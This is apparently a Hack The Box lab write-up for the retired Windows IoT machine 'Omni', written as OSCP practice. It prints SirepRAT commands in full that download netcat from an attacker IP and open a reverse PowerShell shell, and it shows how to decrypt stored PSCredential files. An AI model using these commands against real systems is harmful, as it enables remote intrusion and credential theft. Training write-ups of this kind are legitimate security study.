OSCP PREPROTİONS – HTB Omni

Omni machine is an IoT core machine with Windows operating system which is among the retired machines. It is expected to obtain user and root flags by using vulnerabilities on this machine.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, we found that ports 135/tcp msrpc Microsoft Windows RPC, 8080/tcp upnp Microsoft IIS httpd, 5985/tcp wsman are open.
We are enumerating on port 8080

Here we are asked for credential information, we did the default password, but we could not log in successfully.
Let’s go back to nmape and look at the information given on port 8080
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn’t have a title.

We encountered Windows Device Portal, let’s see if this has a default password or something, let’s Google it

We tried the default information but it didn’t work. Let’s see if there is an exploit for this

we encountered the sirepRAT tool
SirepRAT has full RAT capabilities without the need to write a real RAT malware to the target. I dowloand this tool and run it

I didn’t understand anything in the help section here, but it is explained in detail in the github repo
Here is an example of pulling the hosts file.

As you can see here the command worked, there is also the dowloand part, if we install nc on the target machine and then run it, it will give us the shell screen.
1- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘/c powershell Invoke-WebRequest -OutFile C:\Users\Public\nc64.exe -Uri http://10.10.14.19:8000/nc64.exe’ –v

2- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘/c dir C:\Users\Public /b’ —

(here we first forwarded nc.exe but it did not run on the target system)
3- python SirepRAT.py –v 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘ /c powershell.exe -command C:\Users\Public\nc64.exe -e powershell.exe 10.10.14.19 4747’

(we listened with nc in the background so that our revershell could start)
In command 1 we installed nc64 on the target machine
In command 2 we saw if nc64 was installed on the target
In command 3 we triggered nc64 to give us a revershell

After getting our shell, we typed the command “Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force” and we saw that the user flag was under /app and we got the flag. But we could not access the adminstartor user

We haven’t figured out what this flag does, so we continue with the local enumeration
We list the bat files.

Here we have credential information, let’s try to access port 8080 using this information
administrator _1nt3rn37ofTh1nGz
app mesh5143
we were able to log in using this credentail information

We provide enumeration through this interface
We tested whether the run command field works remarkably

Let’s try to give ourselves a shell again without being the default user.
We put the Nc.64 exe under public

Here we have obtained shell

We don’t understand anything from user and root flags. It may be encrypted System.Management.Automation.PSCredential Let’s google it.
https://www.travisgan.com/2015/06/powershell-password-encryption.html
I looked at the blog post at and followed the instructions here
$UserCred = Import-Clixml -Path C:\data\users\administrator\root.txt
$UserCred.GetNetworkCredential().password
I solved rootflag using commands

I tried the same commands in the user flag, but I was not successful, I thought it might be due to user ownership, we provided a connection using the app user we detected again and ran the revshell export.

This is how we got the user flag